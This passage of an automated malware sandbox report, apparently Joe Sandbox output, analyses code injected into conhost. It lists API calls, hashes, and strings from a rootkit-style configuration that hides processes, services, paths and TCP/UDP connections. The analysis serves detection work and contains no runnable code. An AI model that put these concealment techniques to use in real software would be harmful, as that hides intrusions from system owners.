
APIs

LoadLibraryA.KERNELBASE ref: 00000286D7CE302E

Memory Dump Source

Source File: 00000015.00000003.2188000714.00000286D7CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286D7CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_3_286d7ce0000_conhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 0de59a6a2452775eb398cec1dc1c2e0e448d1d78a51cb2df41b820eb9dbac55a
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: DF91277AB022988FDB648F25D40EB7DB391FB54B94F54C1289E4987788DE38E853C711

Function 00000286D7D11BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000286D7D11724: GetProcessHeap.KERNEL32 ref: 00000286D7D1172F
Part of subcall function 00000286D7D11724: HeapAlloc.KERNEL32 ref: 00000286D7D1173E
Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D117AE
Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D117DB
Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D117F5
Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D11815
Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D11830
Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D11850
Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D1186B
Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D1188B
Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D118A6
Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D118C6

SleepEx.KERNELBASE ref: 00000286D7D11BDF

Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D118E1
Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D11901
Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D1191C
Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D1193C
Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D11957
Part of subcall function 00000286D7D11724: RegOpenKeyExW.ADVAPI32 ref: 00000286D7D11977
Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D11992
Part of subcall function 00000286D7D11724: RegCloseKey.ADVAPI32 ref: 00000286D7D1199C

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: a47a17ae4b68505d64a45506cdc0e8366eeb66d884fd5f0c3572f1a25e580087
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: A531DF6D302A4581FB509B27D95D369A3B6FB84BD0F04D4219E0E877DAEE26C851C31A

Non-executed Functions

Function 00000286D7D12FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00000286D7D13094
lstrlenW.KERNEL32 ref: 00000286D7D132BE

Part of subcall function 00000286D7D11A30: OpenProcess.KERNEL32 ref: 00000286D7D11A56
Part of subcall function 00000286D7D11A30: K32GetModuleFileNameExW.KERNEL32 ref: 00000286D7D11A74
Part of subcall function 00000286D7D11A30: PathFindFileNameW.SHLWAPI ref: 00000286D7D11A83
Part of subcall function 00000286D7D11A30: lstrlenW.KERNEL32 ref: 00000286D7D11A8F
Part of subcall function 00000286D7D11A30: StrCpyW.SHLWAPI ref: 00000286D7D11AA2
Part of subcall function 00000286D7D11A30: CloseHandle.KERNEL32 ref: 00000286D7D11AB0

GetProcAddress.KERNEL32 ref: 00000286D7D130A9

Part of subcall function 00000286D7D13F88: StrCmpNIW.SHLWAPI(?,?,?,00000286D7D1272F), ref: 00000286D7D13FA0

StrCmpNIW.SHLWAPI ref: 00000286D7D130EC
lstrlenW.KERNEL32 ref: 00000286D7D13214

Strings

ntdll.dll, xrefs: 00000286D7D1308D
\Device\Nsi, xrefs: 00000286D7D130DF
NtQueryObject, xrefs: 00000286D7D1309F

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: c1c11526f84db9e2d640cd65c95cc144147f533125a547aa03a8483807e7ef77
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 8FB1C13A312E9082EB69DF66D50C7A9B3A4F744B94F44D06AEE0953B94DF35CD84C341

Function 00000286D7D184B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000286D7D184CC
RtlCaptureContext.NTDLL ref: 00000286D7D184F9
RtlLookupFunctionEntry.NTDLL ref: 00000286D7D18513
RtlVirtualUnwind.NTDLL ref: 00000286D7D18554
IsDebuggerPresent.KERNEL32 ref: 00000286D7D185A8
SetUnhandledExceptionFilter.KERNEL32 ref: 00000286D7D185C5
UnhandledExceptionFilter.KERNEL32 ref: 00000286D7D185D0

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 6723ad2e5e4461230c9ff76a06c814cb2a07fe0bf08aeb05023c7c4a4ee8564f
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: CE315C7A306B808AEB70CF60E8587EE7364F784758F54802ADA4E47B98DF78C649C711

Function 00000286D7D1CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000286D7D1CE0B
RtlLookupFunctionEntry.NTDLL ref: 00000286D7D1CE23
RtlVirtualUnwind.NTDLL ref: 00000286D7D1CE5E
IsDebuggerPresent.KERNEL32 ref: 00000286D7D1CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 00000286D7D1CEA1
UnhandledExceptionFilter.KERNEL32 ref: 00000286D7D1CEAC

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 46a8816f1eccec91265d7340e0120a4b08bd5adb28827ab856caf8b6af42f58b
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 6441933A315F8086E760CF24E8487AE73A4F789768F508126EE9D47B98DF38C555CB01

Function 00000286D7D1DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00000286D7D1DB99
FindNextFileW.KERNEL32 ref: 00000286D7D1DCCF
FindClose.KERNEL32 ref: 00000286D7D1DD0F
FindClose.KERNEL32 ref: 00000286D7D1DD3B

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: d3c70988a892759dff5b92b73d650b54a01a06affbf876819033b26700985735
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 8BA1282AB0678059FB20DB75E58C3AE7BB1E785B94F14C115DE9927B99CF38C442C702

Function 00000286D7D11724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000286D7D1172F
HeapAlloc.KERNEL32 ref: 00000286D7D1173E

Part of subcall function 00000286D7D11264: GetProcessHeap.KERNEL32 ref: 00000286D7D1126A
Part of subcall function 00000286D7D11264: HeapAlloc.KERNEL32 ref: 00000286D7D11279
Part of subcall function 00000286D7D11264: GetProcessHeap.KERNEL32 ref: 00000286D7D11293
Part of subcall function 00000286D7D11264: HeapAlloc.KERNEL32 ref: 00000286D7D112A4

Part of subcall function 00000286D7D11000: GetProcessHeap.KERNEL32 ref: 00000286D7D11006
Part of subcall function 00000286D7D11000: HeapAlloc.KERNEL32 ref: 00000286D7D11015
Part of subcall function 00000286D7D11000: GetProcessHeap.KERNEL32 ref: 00000286D7D11028
Part of subcall function 00000286D7D11000: HeapAlloc.KERNEL32 ref: 00000286D7D11037

RegOpenKeyExW.ADVAPI32 ref: 00000286D7D117AE
RegOpenKeyExW.ADVAPI32 ref: 00000286D7D117DB
RegCloseKey.ADVAPI32 ref: 00000286D7D117F5
RegOpenKeyExW.ADVAPI32 ref: 00000286D7D11815
RegCloseKey.ADVAPI32 ref: 00000286D7D11830
RegOpenKeyExW.ADVAPI32 ref: 00000286D7D11850
RegCloseKey.ADVAPI32 ref: 00000286D7D1186B
RegOpenKeyExW.ADVAPI32 ref: 00000286D7D1188B
RegCloseKey.ADVAPI32 ref: 00000286D7D118A6
RegOpenKeyExW.ADVAPI32 ref: 00000286D7D118C6
RegCloseKey.ADVAPI32 ref: 00000286D7D118E1
RegOpenKeyExW.ADVAPI32 ref: 00000286D7D11901
RegCloseKey.ADVAPI32 ref: 00000286D7D1191C
RegOpenKeyExW.ADVAPI32 ref: 00000286D7D1193C
RegCloseKey.ADVAPI32 ref: 00000286D7D11957
RegOpenKeyExW.ADVAPI32 ref: 00000286D7D11977
RegCloseKey.ADVAPI32 ref: 00000286D7D11992
RegCloseKey.ADVAPI32 ref: 00000286D7D1199C

Part of subcall function 00000286D7D112B8: RegQueryInfoKeyW.ADVAPI32 ref: 00000286D7D11315
Part of subcall function 00000286D7D112B8: GetProcessHeap.KERNEL32 ref: 00000286D7D11323
Part of subcall function 00000286D7D112B8: HeapAlloc.KERNEL32 ref: 00000286D7D11334
Part of subcall function 00000286D7D112B8: RegEnumValueW.ADVAPI32 ref: 00000286D7D11393
Part of subcall function 00000286D7D112B8: GetProcessHeap.KERNEL32 ref: 00000286D7D113DB
Part of subcall function 00000286D7D112B8: HeapAlloc.KERNEL32 ref: 00000286D7D113E9
Part of subcall function 00000286D7D112B8: GetProcessHeap.KERNEL32 ref: 00000286D7D11406
Part of subcall function 00000286D7D112B8: HeapFree.KERNEL32 ref: 00000286D7D11414
Part of subcall function 00000286D7D112B8: lstrlenW.KERNEL32 ref: 00000286D7D1141D
Part of subcall function 00000286D7D112B8: GetProcessHeap.KERNEL32 ref: 00000286D7D1142B
Part of subcall function 00000286D7D112B8: HeapAlloc.KERNEL32 ref: 00000286D7D11439

Strings

service_names, xrefs: 00000286D7D118BF
tcp_local, xrefs: 00000286D7D118FA
SOFTWARE\$rbx-config, xrefs: 00000286D7D1178E
paths, xrefs: 00000286D7D11884
process_names, xrefs: 00000286D7D11849
pid, xrefs: 00000286D7D1180E
startup, xrefs: 00000286D7D117D1
udp, xrefs: 00000286D7D11970
tcp_remote, xrefs: 00000286D7D11935

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 9211349fff17926fa10688af0499826fed1ba2996b7bc1f892f1316a73f19abd
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 83713B3A712A50C6EB209F65E89DA9D33A4FB84B8CF409212DE4E57B28EF39C445C341

Function 00000286D7D112B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000286D7D11315
GetProcessHeap.KERNEL32 ref: 00000286D7D11323
HeapAlloc.KERNEL32 ref: 00000286D7D11334
RegEnumValueW.ADVAPI32 ref: 00000286D7D11393

Part of subcall function 00000286D7D11530: StrCmpIW.SHLWAPI ref: 00000286D7D11561

GetProcessHeap.KERNEL32 ref: 00000286D7D113DB
HeapAlloc.KERNEL32 ref: 00000286D7D113E9
GetProcessHeap.KERNEL32 ref: 00000286D7D11406
HeapFree.KERNEL32 ref: 00000286D7D11414
lstrlenW.KERNEL32 ref: 00000286D7D1141D
GetProcessHeap.KERNEL32 ref: 00000286D7D1142B
HeapAlloc.KERNEL32 ref: 00000286D7D11439
StrCpyW.SHLWAPI ref: 00000286D7D1145B
GetProcessHeap.KERNEL32 ref: 00000286D7D11472
HeapFree.KERNEL32 ref: 00000286D7D11480

Strings

d, xrefs: 00000286D7D11356

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 25354be73c7ffb90ee227dd09b7cd1ce63aa703a667fbaede99687d092f861bc
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 81516E36315B849AEB25CF62E84D76AB7A1F788F98F448124DE4A07758EF3CC04AC711

Function 00000286D7D1EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,00000286D7D1F34A,?,?,00000000,00000286D7D1F2CD), ref: 00000286D7D1EFF5
GetLastError.KERNEL32(?,?,00000000,00000286D7D1F2CD), ref: 00000286D7D1F007
LoadLibraryExW.KERNEL32(?,?,00000000,00000286D7D1F2CD), ref: 00000286D7D1F049
VirtualProtect.KERNEL32 ref: 00000286D7D1F0A5
VirtualProtect.KERNEL32 ref: 00000286D7D1F0D6
FreeLibrary.KERNEL32(?,?,00000000,00000286D7D1F2CD), ref: 00000286D7D1F11A
GetProcAddress.KERNEL32(?,?,00000000,00000286D7D1F2CD), ref: 00000286D7D1F126

Strings

AppPolicyGetProcessTerminationMethod, xrefs: 00000286D7D1F157, 00000286D7D1F165
api-ms-, xrefs: 00000286D7D1F01B
ext-ms-, xrefs: 00000286D7D1F02E

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 5df06b051aabdd4973b1e483568b970bea790204de5457453e43f62c0818b48b
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: BB51D329703B4491FE259B56E80C7A92390BB48BB0F988725DE3E573D0EF38D446C752

Function 00000286D7D133A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 00000286D7D133FD
GetProcessHeap.KERNEL32 ref: 00000286D7D13412
HeapAlloc.KERNEL32 ref: 00000286D7D13420
PdhGetCounterInfoW.PDH ref: 00000286D7D13436
StrCmpW.SHLWAPI ref: 00000286D7D1344B

Part of subcall function 00000286D7D13950: StrCmpNW.SHLWAPI ref: 00000286D7D13972
Part of subcall function 00000286D7D13950: StrStrW.SHLWAPI ref: 00000286D7D13990
Part of subcall function 00000286D7D13950: StrToIntW.SHLWAPI ref: 00000286D7D139B7

GetProcessHeap.KERNEL32 ref: 00000286D7D13488
HeapFree.KERNEL32 ref: 00000286D7D13496

Strings

\GPU Engine(*)\Running Time, xrefs: 00000286D7D13444

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 84db21b620b9754859a015ae8d2ddfb1055a04da7a8c0ad90895f04f7d9eaa9c
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: F731A03AB05F4197FB21DF52A80C759B3A0F788BD9F448665DE4A43A24EF38C856C741

Function 00000286D7D134B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 00000286D7D13516
GetProcessHeap.KERNEL32 ref: 00000286D7D13527
HeapAlloc.KERNEL32 ref: 00000286D7D13535
PdhGetCounterInfoW.PDH ref: 00000286D7D1354B
StrCmpW.SHLWAPI ref: 00000286D7D13560

Part of subcall function 00000286D7D13950: StrCmpNW.SHLWAPI ref: 00000286D7D13972
Part of subcall function 00000286D7D13950: StrStrW.SHLWAPI ref: 00000286D7D13990
Part of subcall function 00000286D7D13950: StrToIntW.SHLWAPI ref: 00000286D7D139B7

GetProcessHeap.KERNEL32 ref: 00000286D7D1358D
HeapFree.KERNEL32 ref: 00000286D7D1359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 00000286D7D13559

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 50fdc1c5f1c3a211b10cd7bbce97c1fb19189cf5b02384854fa77d5aaebfe272
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 78316B39716F418AFB20DF22A89CB59B7A0B784F98F448165DE4A43764EF38C846C701

Function 00000286D7CE962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000286D7CE9689

Part of subcall function 00000286D7CEA544: __GetUnwindTryBlock.LIBCMT ref: 00000286D7CEA587
Part of subcall function 00000286D7CEA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000286D7CEA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000286D7CE9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000286D7CE99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000286D7CE9ABC

Strings

csm, xrefs: 00000286D7CE96A3
csm, xrefs: 00000286D7CE9784
csm, xrefs: 00000286D7CE970A

Memory Dump Source

Source File: 00000015.00000003.2188000714.00000286D7CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286D7CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_3_286d7ce0000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: 6bed1bb26b7bdcff5c8bc5524321704267e5b62ef3aa67574b1af55792dad4b2
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 19D1C27A7017888EEB60DF65D48E3AD37A4F745788F109115EE8997B96DF38C082C702

Function 00000286D7D1A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000286D7D1A289

Part of subcall function 00000286D7D1B144: __GetUnwindTryBlock.LIBCMT ref: 00000286D7D1B187
Part of subcall function 00000286D7D1B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000286D7D1B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000286D7D1A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000286D7D1A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000286D7D1A6BC

Strings

csm, xrefs: 00000286D7D1A384
csm, xrefs: 00000286D7D1A2A3
csm, xrefs: 00000286D7D1A30A

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
